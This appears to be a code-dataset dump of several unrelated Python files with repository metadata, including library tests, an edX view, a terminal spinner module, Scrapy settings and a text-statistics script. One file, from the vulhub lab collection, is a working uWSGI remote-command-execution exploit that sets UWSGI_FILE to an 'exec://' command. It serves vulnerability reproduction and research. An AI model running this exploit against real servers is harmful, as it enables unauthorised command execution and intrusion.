# f = lambda t1 = None, t2 = None: max([dt(t1), dt(t2)]) # constructing a function that goes deep recursively
a = cell(f)()
b = cell(f, t1 = a)()
c = cell(f, t1 = b)()
d = cell(f, t1 = c)()
e = cell(f, t1 = d)()
assert not e.run() and not e.t1.run() and not e.t1.t1.run()
e0 = e()
assert e0.data == e.data
e1 = e.go(1)
assert e1.data >= e.data and e1.t1.data == e.t1.data
e2 = e.go(2)
assert e2.data >= e.data and e2.t1.data >= e.t1.data and e2.t1.t1.data == e.t1.t1.data
g = e.go(-1)
assert g.data >= e.data and g.t1.data >= e.t1.data and g.t1.t1.data >= e.t1.t1.data and g.t1.t1.t1.data >= e.t1.t1.t1.data
def test_cell_inputs():
c = cell(lambda a, b: a*b , a = 'text', b = 2)
assert cell_inputs(c) == []
assert cell_inputs(c, int) == [2]
assert cell_inputs(c, str) == ['text']
assert cell_inputs(c, (str,int)) == ['text', 2]
d = cell(lambda x, y: x +y, x = [c,c,3], y = [c,4])
assert cell_inputs(d) == [c,c,c]
assert cell_inputs(d, int) == [3,4]
e = cell(lambda x, y: x +y, x = dict(a = d, b = 4), y = [c,5])
assert cell_inputs(e) == [d,c]
assert cell_inputs(e, int) == [4,5]
def test_cell_push_and_updated():
a = cell(passthru, data = 1, pk = 'i', i = 0)()
b = cell(passthru, data = 2, pk = 'i', i = 1)()
GRAPH = get_cache('GRAPH')
assert a._address in GRAPH and b._address in GRAPH
a_ = a; b_ = b
for i in range(2, 10):
c = cell(add_, a = a_, b = b_, pk = 'i', i = i)()
a_ = b_
b_ = c
a = a.push()
UPDATED = get_cache('UPDATED')
assert len(UPDATED) == 0
assert c.data == 89
b = b.go()
assert list(UPDATED.keys()) == [(('i', 1),)]
c.data = 3
b = b.push()
assert UPDATED == {}
| 29.70098
| 126
| 0.523519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 478
| 0.078891
|
a244d716297448851950a6f197be289befd9e237
| 4,379
|
py
|
Python
|
uwsgi/unacc/poc.py
|
nobgr/vulhub
|
b24a89459fbd98ba76881adb6d4e2fb376792863
|
[
"MIT"
] | 9,681
|
2017-09-16T12:31:59.000Z
|
2022-03-31T23:49:31.000Z
|
uwsgi/unacc/poc.py
|
dingafter/vulhub
|
67547c4ca153980004ccaeab94f77bcc9952d764
|
[
"MIT"
] | 180
|
2017-11-01T08:05:07.000Z
|
2022-03-31T05:26:33.000Z
|
uwsgi/unacc/poc.py
|
dingafter/vulhub
|
67547c4ca153980004ccaeab94f77bcc9952d764
|
[
"MIT"
] | 3,399
|
2017-09-16T12:21:54.000Z
|
2022-03-31T12:28:48.000Z
|
#!/usr/bin/python
# coding: utf-8
######################
# Uwsgi RCE Exploit
######################
# Author: wofeiwo@80sec.com
# Created: 2017-7-18
# Last modified: 2018-1-30
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
def sz(x):
s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
return s[::-1]
def pack_uwsgi_vars(var):
pk = b''
for k, v in var.items() if hasattr(var, 'items') else var:
pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
result = b'\x00' + sz(pk) + b'\x00' + pk
return result
def parse_addr(addr, default_port=None):
port = default_port
if isinstance(addr, str):
if addr.isdigit():
addr, port = '', addr
elif ':' in addr:
addr, _, port = addr.partition(':')
elif isinstance(addr, (list, tuple, set)):
addr, port = addr
port = int(port) if port else port
return (addr or '127.0.0.1', port)
def get_host_from_url(url):
if '//' in url:
url = url.split('//', 1)[1]
host, _, url = url.partition('/')
return (host, '/' + url)
def fetch_data(uri, payload=None, body=None):
if 'http' not in uri:
uri = 'http://' + uri
s = requests.Session()
# s.headers['UWSGI_FILE'] = payload
if body:
import urlparse
body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))
d = s.post(uri, data=body_d)
else:
d = s.get(uri)
return {
'code': d.status_code,
'text': d.text,
'header': d.headers
}
def ask_uwsgi(addr_and_port, mode, var, body=''):
if mode == 'tcp':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(parse_addr(addr_and_port))
elif mode == 'unix':
s = socket.socket(socket.AF_UNIX)
s.connect(addr_and_port)
s.send(pack_uwsgi_vars(var) + body.encode('utf8'))
response = []
# Actually we dont need the response, it will block if we run any commands.
# So I comment all the receiving stuff.
# while 1:
# data = s.recv(4096)
# if not data:
# break
# response.append(data)
s.close()
return b''.join(response).decode('utf8')
def curl(mode, addr_and_port, payload, target_url):
host, uri = get_host_from_url(target_url)
path, _, qs = uri.partition('?')
if mode == 'http':
return fetch_data(addr_and_port+uri, payload)
elif mode == 'tcp':
host = host or parse_addr(addr_and_port)[0]
else:
host = addr_and_port
var = {
'SERVER_PROTOCOL': 'HTTP/1.1',
'REQUEST_METHOD': 'GET',
'PATH_INFO': path,
'REQUEST_URI': uri,
'QUERY_STRING': qs,
'SERVER_NAME': host,
'HTTP_HOST': host,
'UWSGI_FILE': payload,
'SCRIPT_NAME': target_url
}
return ask_uwsgi(addr_and_port, mode, var)
def main(*args):
desc = """
This is a uwsgi client & RCE exploit.
Last modifid at 2018-01-30 by wofeiwo@80sec.com
"""
elog = "Example:uwsgi_exp.py -u 1.2.3.4:5000 -c \"echo 111>/tmp/abc\""
parser = argparse.ArgumentParser(description=desc, epilog=elog)
parser.add_argument('-m', '--mode', nargs='?', default='tcp',
help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',
dest='mode', choices=['http', 'tcp', 'unix'])
parser.add_argument('-u', '--uwsgi', nargs='?', required=True,
help='Uwsgi server: 1.2.3.4:5000 or /tmp/uwsgi.sock',
dest='uwsgi_addr')
parser.add_argument('-c', '--command', nargs='?', required=True,
help='Command: The exploit command you want to execute, must have this.',
dest='command')
if len(sys.argv) < 2:
parser.print_help()
return
args = parser.parse_args()
if args.mode.lower() == "http":
print("[-]Currently only tcp/unix method is supported in RCE exploit.")
return
payload = 'exec://' + args.command + "; echo test" # must have someting in output or the uWSGI crashs.
print("[*]Sending payload.")
print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))
if __name__ == '__main__':
main()
| 30.2
| 106
| 0.570222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,358
| 0.309975
|
a2453fb1d06de4864cf98c020579a6af505d8bfa
| 4,169
|
py
|
Python
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/dark_lang/views.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/dark_lang/views.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/dark_lang/views.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Views file for the Darklang Django App
"""
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.shortcuts import redirect
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.utils.translation import LANGUAGE_SESSION_KEY
from django.utils.translation import ugettext as _
from web_fragments.fragment import Fragment
from openedx.core.djangoapps.dark_lang import DARK_LANGUAGE_KEY
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
from openedx.core.djangoapps.plugin_api.views import EdxFragmentView
from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference
from openedx.core.djangoapps.util.user_messages import PageLevelMessages
LANGUAGE_INPUT_FIELD = 'preview_language'
class PreviewLanguageFragmentView(EdxFragmentView):
"""
View used when a user is attempting to change the preview language using Darklang.
Expected Behavior:
GET - returns a form for setting/resetting the user's dark language
POST - updates or clears the setting to the given dark language
"""
def render_to_fragment(self, request, course_id=None, **kwargs): # lint-amnesty, pylint: disable=arguments-differ, unused-argument
"""
Renders the language preview view as a fragment.
"""
html = render_to_string('dark_lang/preview-language-fragment.html', {})
return Fragment(html)
def create_base_standalone_context(self, request, fragment, **kwargs):
"""
Creates the base context for rendering a fragment as a standalone page.
"""
return {
'uses_bootstrap': True,
}
def standalone_page_title(self, request, fragment, **kwargs):
"""
Returns the page title for the standalone update page.
"""
return _('Preview Language Administration')
@method_decorator(login_required)
def get(self, request, *args, **kwargs):
"""
Renders the fragment to control the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
return super().get(request, *args, **kwargs)
@method_decorator(login_required)
def post(self, request, **kwargs): # lint-amnesty, pylint: disable=unused-argument
"""
Accept requests to update the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
action = request.POST.get('action', None)
if action == 'set_preview_language':
self._set_preview_language(request)
elif action == 'reset_preview_language':
self._clear_preview_language(request)
return redirect(request.path)
def _user_can_preview_languages(self, user):
"""
Returns true if the specified user can preview languages.
"""
if not DarkLangConfig.current().enabled:
return False
return user and not user.is_anonymous
def _set_preview_language(self, request):
"""
Sets the preview language for the current user.
"""
preview_language = request.POST.get(LANGUAGE_INPUT_FIELD, '')
if not preview_language.strip():
PageLevelMessages.register_error_message(request, _('Language not provided'))
return
set_user_preference(request.user, DARK_LANGUAGE_KEY, preview_language)
PageLevelMessages.register_success_message(
request,
_('Language set to {preview_language}').format(
preview_language=preview_language
)
)
def _clear_preview_language(self, request):
"""
Clears the preview language for the current user.
"""
delete_user_preference(request.user, DARK_LANGUAGE_KEY)
if LANGUAGE_SESSION_KEY in request.session:
del request.session[LANGUAGE_SESSION_KEY]
PageLevelMessages.register_success_message(
request,
_('Language reset to the default')
)
| 36.893805
| 135
| 0.688894
| 3,308
| 0.793476
| 0
| 0
| 876
| 0.210122
| 0
| 0
| 1,293
| 0.310146
|
a2455b7d1f4c59b3f3fc10bc30bcb0f313e3156b
| 13,480
|
py
|
Python
|
pipenv/vendor/vistir/spin.py
|
erikkemperman/pipenv
|
8707fe52571422ff5aa2905a2063fdf5ce14840b
|
[
"MIT"
] | 3
|
2020-06-04T05:22:33.000Z
|
2020-09-23T19:44:02.000Z
|
pipenv/vendor/vistir/spin.py
|
erikkemperman/pipenv
|
8707fe52571422ff5aa2905a2063fdf5ce14840b
|
[
"MIT"
] | 9
|
2019-12-05T00:49:12.000Z
|
2021-09-08T01:31:25.000Z
|
pipenv/vendor/vistir/spin.py
|
erikkemperman/pipenv
|
8707fe52571422ff5aa2905a2063fdf5ce14840b
|
[
"MIT"
] | 1
|
2019-06-04T10:25:26.000Z
|
2019-06-04T10:25:26.000Z
|
# -*- coding=utf-8 -*-
import functools
import os
import signal
import sys
import threading
import time
import colorama
import cursor
import six
from .compat import to_native_string
from .termcolors import COLOR_MAP, COLORS, colored, DISABLE_COLORS
from io import StringIO
try:
import yaspin
except ImportError:
yaspin = None
Spinners = None
else:
from yaspin.spinners import Spinners
handler = None
if yaspin and os.name == "nt":
handler = yaspin.signal_handlers.default_handler
elif yaspin and os.name != "nt":
handler = yaspin.signal_handlers.fancy_handler
CLEAR_LINE = chr(27) + "[K"
class DummySpinner(object):
def __init__(self, text="", **kwargs):
super(DummySpinner, self).__init__()
if DISABLE_COLORS:
colorama.init()
from .misc import decode_for_output
self.text = to_native_string(decode_for_output(text)) if text else ""
self.stdout = kwargs.get("stdout", sys.stdout)
self.stderr = kwargs.get("stderr", sys.stderr)
self.out_buff = StringIO()
self.write_to_stdout = kwargs.get("write_to_stdout", False)
def __enter__(self):
if self.text and self.text != "None":
if self.write_to_stdout:
self.write(self.text)
return self
def __exit__(self, exc_type, exc_val, traceback):
if exc_type:
import traceback
from .misc import decode_for_output
self.write_err(decode_for_output(traceback.format_exception(*sys.exc_info())))
self._close_output_buffer()
return False
def __getattr__(self, k):
try:
retval = super(DummySpinner, self).__getattribute__(k)
except AttributeError:
if k in COLOR_MAP.keys() or k.upper() in COLORS:
return self
raise
else:
return retval
def _close_output_buffer(self):
if self.out_buff and not self.out_buff.closed:
try:
self.out_buff.close()
except Exception:
pass
def fail(self, exitcode=1, text="FAIL"):
from .misc import decode_for_output
if text and text != "None":
if self.write_to_stdout:
self.write(decode_for_output(text))
else:
self.write_err(decode_for_output(text))
self._close_output_buffer()
def ok(self, text="OK"):
if text and text != "None":
if self.write_to_stdout:
self.stdout.write(self.text)
else:
self.stderr.write(self.text)
self._close_output_buffer()
return 0
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text=None):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
text = decode_for_output(text)
self.stdout.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stdout.write(line)
self.stdout.write(CLEAR_LINE)
def write_err(self, text=None):
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
text = decode_for_output(text)
self.stderr.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stderr.write(line)
self.stderr.write(CLEAR_LINE)
@staticmethod
def _hide_cursor(target=None):
pass
@staticmethod
def _show_cursor(target=None):
pass
base_obj = yaspin.core.Yaspin if yaspin is not None else DummySpinner
class VistirSpinner(base_obj):
"A spinner class for handling spinners on windows and posix."
def __init__(self, *args, **kwargs):
"""
Get a spinner object or a dummy spinner to wrap a context.
Keyword Arguments:
:param str spinner_name: A spinner type e.g. "dots" or "bouncingBar" (default: {"bouncingBar"})
:param str start_text: Text to start off the spinner with (default: {None})
:param dict handler_map: Handler map for signals to be handled gracefully (default: {None})
:param bool nospin: If true, use the dummy spinner (default: {False})
:param bool write_to_stdout: Writes to stdout if true, otherwise writes to stderr (default: True)
"""
self.handler = handler
colorama.init()
sigmap = {}
if handler:
sigmap.update({
signal.SIGINT: handler,
signal.SIGTERM: handler
})
handler_map = kwargs.pop("handler_map", {})
if os.name == "nt":
sigmap[signal.SIGBREAK] = handler
else:
sigmap[signal.SIGALRM] = handler
if handler_map:
sigmap.update(handler_map)
spinner_name = kwargs.pop("spinner_name", "bouncingBar")
start_text = kwargs.pop("start_text", None)
_text = kwargs.pop("text", "Running...")
kwargs["text"] = start_text if start_text is not None else _text
kwargs["sigmap"] = sigmap
kwargs["spinner"] = getattr(Spinners, spinner_name, "")
write_to_stdout = kwargs.pop("write_to_stdout", True)
self.stdout = kwargs.pop("stdout", sys.stdout)
self.stderr = kwargs.pop("stderr", sys.stderr)
self.out_buff = StringIO()
self.write_to_stdout = write_to_stdout
self.is_dummy = bool(yaspin is None)
super(VistirSpinner, self).__init__(*args, **kwargs)
def ok(self, text="OK", err=False):
"""Set Ok (success) finalizer to a spinner."""
# Do not display spin text for ok state
self._text = None
_text = text if text else "OK"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def fail(self, text="FAIL", err=False):
"""Set fail finalizer to a spinner."""
# Do not display spin text for fail state
self._text = None
_text = text if text else "FAIL"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import to_text
sys.stdout.write("\r")
self.stdout.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stdout.write(text)
self.out_buff.write(to_text(text))
def write_err(self, text):
"""Write error text in the terminal without breaking the spinner."""
from .misc import to_text
self.stderr.write("\r")
self.stderr.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stderr.write(text)
self.out_buff.write(to_text(text))
def start(self):
if self._sigmap:
self._register_signal_handlers()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
self._hide_cursor(target=target)
self._stop_spin = threading.Event()
self._hide_spin = threading.Event()
self._spin_thread = threading.Thread(target=self._spin)
self._spin_thread.start()
def stop(self):
if self._dfl_sigmap:
# Reset registered signal handlers to default ones
self._reset_signal_handlers()
if self._spin_thread:
self._stop_spin.set()
self._spin_thread.join()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
target.write("\r")
if self.write_to_stdout:
self._clear_line()
else:
self._clear_err()
if target.isatty():
self._show_cursor(target=target)
if self.stderr and self.stderr != sys.stderr:
self.stderr.close()
if self.stdout and self.stdout != sys.stdout:
self.stdout.close()
self.out_buff.close()
def _freeze(self, final_text, err=False):
"""Stop spinner, compose last frame and 'freeze' it."""
if not final_text:
final_text = ""
text = to_native_string(final_text)
self._last_frame = self._compose_out(text, mode="last")
# Should be stopped here, otherwise prints after
# self._freeze call will mess up the spinner
self.stop()
if err or not self.write_to_stdout:
self.stderr.write(self._last_frame)
else:
self.stdout.write(self._last_frame)
def _compose_color_func(self):
fn = functools.partial(
colored,
color=self._color,
on_color=self._on_color,
attrs=list(self._attrs),
)
return fn
def _compose_out(self, frame, mode=None):
# Ensure Unicode input
frame = to_native_string(frame)
if self._text is None:
self._text = ""
text = to_native_string(self._text)
if self._color_func is not None:
frame = self._color_func(frame)
if self._side == "right":
frame, text = text, frame
# Mode
if not mode:
out = to_native_string("\r{0} {1}".format(frame, text))
else:
out = to_native_string("{0} {1}\n".format(frame, text))
return out
def _spin(self):
target = self.stdout if self.write_to_stdout else self.stderr
clear_fn = self._clear_line if self.write_to_stdout else self._clear_err
while not self._stop_spin.is_set():
if self._hide_spin.is_set():
# Wait a bit to avoid wasting cycles
time.sleep(self._interval)
continue
# Compose output
spin_phase = next(self._cycle)
out = self._compose_out(spin_phase)
# Write
target.write(out)
clear_fn()
target.flush()
# Wait
time.sleep(self._interval)
target.write("\b")
def _register_signal_handlers(self):
# SIGKILL cannot be caught or ignored, and the receiving
# process cannot perform any clean-up upon receiving this
# signal.
try:
if signal.SIGKILL in self._sigmap.keys():
raise ValueError(
"Trying to set handler for SIGKILL signal. "
"SIGKILL cannot be cought or ignored in POSIX systems."
)
except AttributeError:
pass
for sig, sig_handler in self._sigmap.items():
# A handler for a particular signal, once set, remains
# installed until it is explicitly reset. Store default
# signal handlers for subsequent reset at cleanup phase.
dfl_handler = signal.getsignal(sig)
self._dfl_sigmap[sig] = dfl_handler
# ``signal.SIG_DFL`` and ``signal.SIG_IGN`` are also valid
# signal handlers and are not callables.
if callable(sig_handler):
# ``signal.signal`` accepts handler function which is
# called with two arguments: signal number and the
# interrupted stack frame. ``functools.partial`` solves
# the problem of passing spinner instance into the handler
# function.
sig_handler = functools.partial(sig_handler, spinner=self)
signal.signal(sig, sig_handler)
def _reset_signal_handlers(self):
for sig, sig_handler in self._dfl_sigmap.items():
signal.signal(sig, sig_handler)
@staticmethod
def _hide_cursor(target=None):
if not target:
target = sys.stdout
cursor.hide(stream=target)
@staticmethod
def _show_cursor(target=None):
if not target:
target = sys.stdout
cursor.show(stream=target)
@staticmethod
def _clear_err():
sys.stderr.write(CLEAR_LINE)
@staticmethod
def _clear_line():
sys.stdout.write(CLEAR_LINE)
def create_spinner(*args, **kwargs):
nospin = kwargs.pop("nospin", False)
use_yaspin = kwargs.pop("use_yaspin", not nospin)
if nospin or not use_yaspin:
return DummySpinner(*args, **kwargs)
return VistirSpinner(*args, **kwargs)
| 33.120393
| 105
| 0.602819
| 12,530
| 0.929525
| 0
| 0
| 543
| 0.040282
| 0
| 0
| 2,288
| 0.169733
|
a24661a46dbbfae17cce472d5d44c7bd7360c84c
| 621
|
py
|
Python
|
book/book/settings.py
|
ChaosSoong/ScrapyDouban
|
e6a018a09e76f5f5506934e90b104091dfffe693
|
[
"MIT"
] | 1
|
2021-04-12T13:37:48.000Z
|
2021-04-12T13:37:48.000Z
|
book/book/settings.py
|
ChaosSoong/ScrapyDouban
|
e6a018a09e76f5f5506934e90b104091dfffe693
|
[
"MIT"
] | null | null | null |
book/book/settings.py
|
ChaosSoong/ScrapyDouban
|
e6a018a09e76f5f5506934e90b104091dfffe693
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
BOT_NAME = 'book'
SPIDER_MODULES = ['book.spiders']
NEWSPIDER_MODULE = 'book.spiders'
IMAGES_STORE = '../storage/book/'
COOKIES_ENABLED = True
COOKIE_DEBUG = True
LOG_LEVEL = 'INFO'
# LOG_LEVEL = 'DEBUG'
CONCURRENT_REQUESTS = 100
CONCURRENT_REQUESTS_PER_DOMAIN = 1000
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, \
like Gecko) Chrome/49.0.2623.87 Safari/537.36"
DEFAULT_REQUEST_HEADERS = {
'Referer': 'https://m.douban.com/book/'
}
ITEM_PIPELINES = {
'book.pipelines.CoverPipeline': 0,
'book.pipelines.BookPipeline': 1,
}
| 20.7
| 79
| 0.705314
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 332
| 0.534622
|
a246d1c2c2b92da01d8058201ebb138463ac4efe
| 105
|
py
|
Python
|
tests/pyxl_original/test_eof.py
|
adrienbrunet/mixt
|
d725ec752ce430d135e993bc988bfdf2b8457c4b
|
[
"MIT"
] | 27
|
2018-06-04T19:11:42.000Z
|
2022-02-23T22:46:39.000Z
|
tests/pyxl_original/test_eof.py
|
adrienbrunet/mixt
|
d725ec752ce430d135e993bc988bfdf2b8457c4b
|
[
"MIT"
] | 7
|
2018-06-09T15:27:51.000Z
|
2021-03-11T20:00:35.000Z
|
tests/pyxl_original/test_eof.py
|
adrienbrunet/mixt
|
d725ec752ce430d135e993bc988bfdf2b8457c4b
|
[
"MIT"
] | 3
|
2018-07-29T10:20:02.000Z
|
2021-11-18T19:55:07.000Z
|
# coding: mixt
from mixt import html
def test():
assert str(<Fragment>'''</Fragment>) == """'''"""
| 15
| 53
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.371429
|
a247922adf11769c636098f78e98f1b9b8df3ed1
| 6,325
|
py
|
Python
|
text_analysis/analysis_classify/a01_basic_statistics.py
|
yongzhuo/Text-Analysis
|
6f9f79fdb1e6ea1c5559b59558cee641940f85d2
|
[
"Apache-2.0"
] | 3
|
2021-11-19T07:02:53.000Z
|
2021-12-15T03:15:15.000Z
|
text_analysis/analysis_classify/a01_basic_statistics.py
|
yongzhuo/Text-Analysis
|
6f9f79fdb1e6ea1c5559b59558cee641940f85d2
|
[
"Apache-2.0"
] | null | null | null |
text_analysis/analysis_classify/a01_basic_statistics.py
|
yongzhuo/Text-Analysis
|
6f9f79fdb1e6ea1c5559b59558cee641940f85d2
|
[
"Apache-2.0"
] | null | null | null |
# !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2020/5/27 21:18
# @author : Mo
# @function: 统计
from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files
from text_analysis.conf.path_log import logger
from collections import Counter
from typing import List, Dict
import json
import os
import matplotlib.ticker as ticker
import matplotlib.pyplot as plt
from pylab import mpl
def counter_length_label(path_file, dir_save, show: str="bar"):
"""
统计文本长度-类别数
:param path_file: str
:param path_save: str
:return:
"""
files = get_all_dirs_files(path_file)
files = [file for file in files if file.endswith(".json")]
tc_data_dev = []
for f in files:
tc_data_dev += txt_read(f)
# 文本长度与类别数
lengths_question = []
label_total = []
for tdd in tc_data_dev:
tdd_json = json.loads(tdd)
question = tdd_json.get("text", "")
label = tdd_json.get("label")
lengths_question.append(len(question))
if type(label) == list:
label_total += label
else:
label_total.append(label)
# 统计
lengths_dict = dict(Counter(lengths_question))
label_dict = dict(Counter(label_total))
# 排序
lengths_dict_sort = sorted(lengths_dict.items(), key=lambda x: x[0], reverse=False)
label_dict_sort = sorted(label_dict.items(), key=lambda x: x[1], reverse=True)
logger.info("length of text is {}".format(lengths_dict_sort))
logger.info("freq of label is {}".format(label_dict_sort))
# 长度覆盖
lengths_question.sort()
len_ques = len(lengths_question)
len_99 = lengths_question[int(0.99 * len_ques)]
len_98 = lengths_question[int(0.98 * len_ques)]
len_95 = lengths_question[int(0.95 * len_ques)]
len_90 = lengths_question[int(0.90 * len_ques)]
logger.info("99% length of text is {}".format(len_99))
logger.info("98% length of text is {}".format(len_98))
logger.info("95% length of text is {}".format(len_95))
logger.info("90% length of text is {}".format(len_90))
length_dict = {"len_99": len_99,
"len_98": len_98,
"len_95": len_95,
"len_90": len_90
}
# 文本长度length/字典
save_json(length_dict, os.path.join(dir_save, "length.json"))
# 文本长度length/展示
draw_picture(lengths_dict_sort, os.path.join(dir_save, "length.png"), show="plot")
# 类别数label/展示
draw_picture(label_dict_sort, os.path.join(dir_save, "label.png"), show)
# 箱型图length/展示
draw_box([lengths_question], os.path.join(dir_save, "{}_boxplot.png".format("length")))
def show_chinese(xs: List, ys: List, file: str=None, show: str="bar"):
"""
画折线图,支持中文
:param xs: list
:param ys: list
:param dir: str
:return: draw picture
"""
mpl.rcParams["font.sans-serif"] = ["SimHei"]
xis = [i for i in range(len(xs))]
if len(ys) >= 32:
plt.xscale('symlog')
plt.yscale('symlog')
plt.subplots_adjust(bottom=0.2)
# plt.figure(dpi=64)
# elif len(ys) >= 128:
# plt.xscale('log')
# plt.yscale('log')
# plt.yticks(xis, ys, size='small', fontsize=13)
if show=="plot": # 绘制折线图
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(64))
# plt.figure(dpi=256)
# from matplotlib.font_manager import FontProperties
# font = FontProperties(fname="C:\Windows\Fonts\simkai.ttf", size=16)
# fontproperites = font
# fontdict={"fontname":"C:\Windows\Fonts\simkai.ttf"}
# plt.xlabel(xs, fontproperites = font)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
plt.plot(xis, xs, 'o-', label=u"线条") # 画图
elif show=="pie": # 绘制扇形图
# plt.figure(dpi=256)
plt.xticks(xis, xs, size='small', rotation=64, fontsize=13)
plt.pie(xs, labels=ys, autopct='%1.1f%%', shadow=False, startangle=150)
else: # 绘制并列柱状图
# 创建画布
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(max(int(len(xs)/16), 128)))
# plt.figure(dpi=128)
# plt.figure(dpi=256)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
plt.bar(xis, xs, 0.8)
# plt.figure(figsize=(min(512, len(xs)), min(256, int(len(xs)/2))), dpi=32)
# plt.figure(dpi=128)
# plt.yticks(xis, ys, size='small', fontsize=13)
# plt.barh(xis, xs, 0.8)
if file: # 保存图片, save要在plt之前才行
plt.savefig(file)
else: # 没有指定则默认一个
plt.savefig("fig.png")
# plt.show()
plt.close()
def draw_picture(xy_list_tuple, path, show: str="bar"):
"""
文本长度-类别(展示-保存)
:param xy_list_tuple: List[tuple]
:param path: str
:return:
"""
length_x = []
length_y = []
for k, v in xy_list_tuple:
length_x.append(k)
length_y.append(v)
show_chinese(length_y, length_x, path, show)
def draw_box(boxs: List, file: str=None):
"""
箱线图、箱型图 boxplot()
:param boxs: list
:param file: str
:return:
"""
mpl.rcParams["font.sans-serif"] = ["SimHei"] # 中文
plt.figure(figsize=(10, 5)) # 设置画布的尺寸
plt.title("boxplot-length", fontsize=20) # 标题,并设定字号大小
# notch:是否是凹口的形式展现箱线图;sym:异常点的形状;
plt.boxplot(boxs, notch=True, sym="*", vert=False, showmeans=True, patch_artist=True)
# boxprops={'color':'orangered', 'facecolor':'gray'}) # 颜色
if file: # 保存图片, save要在plt之前才行
plt.savefig(file)
else: # 没有指定则默认一个
plt.savefig("boxplot.png")
# plt.show() # 显示图像
plt.close()
if __name__ == '__main__':
path_in_dir = "../data/corpus/classify"
path_save_dir = "../data/corpus/classify/分析结果"
if path_save_dir is None:
path_save_dir = os.path.join(os.path.dirname(path_in_dir), "分析结果")
if path_save_dir:
if not os.path.exists(path_save_dir):
os.mkdir(path_save_dir)
counter_length_label(path_in_dir, path_save_dir, show="bar")
# show_x = [i for i in range(32)]
# show_y = [str("你是谁") for i in range(32)]
# show_chinese(show_x, show_y, file="xy1.png")
# show_chinese(show_x, show_y, file="xy2.png", show="pie")
# show_chinese(show_x, show_y, file="xy3.png", show="plot")
| 33.115183
| 105
| 0.61502
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,791
| 0.415513
|
a2480500111770e0985c6d623537477de897c591
| 1,689
|
py
|
Python
|
components/workstation.py
|
cqzhao/FooProxy
|
5953bcd46388135e0c951ffbcd63dc782ff8bfad
|
[
"MIT"
] | null | null | null |
components/workstation.py
|
cqzhao/FooProxy
|
5953bcd46388135e0c951ffbcd63dc782ff8bfad
|
[
"MIT"
] | null | null | null |
components/workstation.py
|
cqzhao/FooProxy
|
5953bcd46388135e0c951ffbcd63dc782ff8bfad
|
[
"MIT"
] | null | null | null |
#coding:utf-8
"""
@author : linkin
@email : yooleak@outlook.com
@date : 2018-10-04
"""
import logging
from APIserver.apiserver import app
from components.collector import Collector
from components.validator import Validator
from components.detector import Detector
from components.scanner import Scaner
from components.tentacle import Tentacle
from multiprocessing import Pool
from multiprocessing import Manager
from config.config import MODE
from const.settings import RUN_FUNC
logger = logging.getLogger()
class Workstation(object):
"""
整个项目的启动工作面板
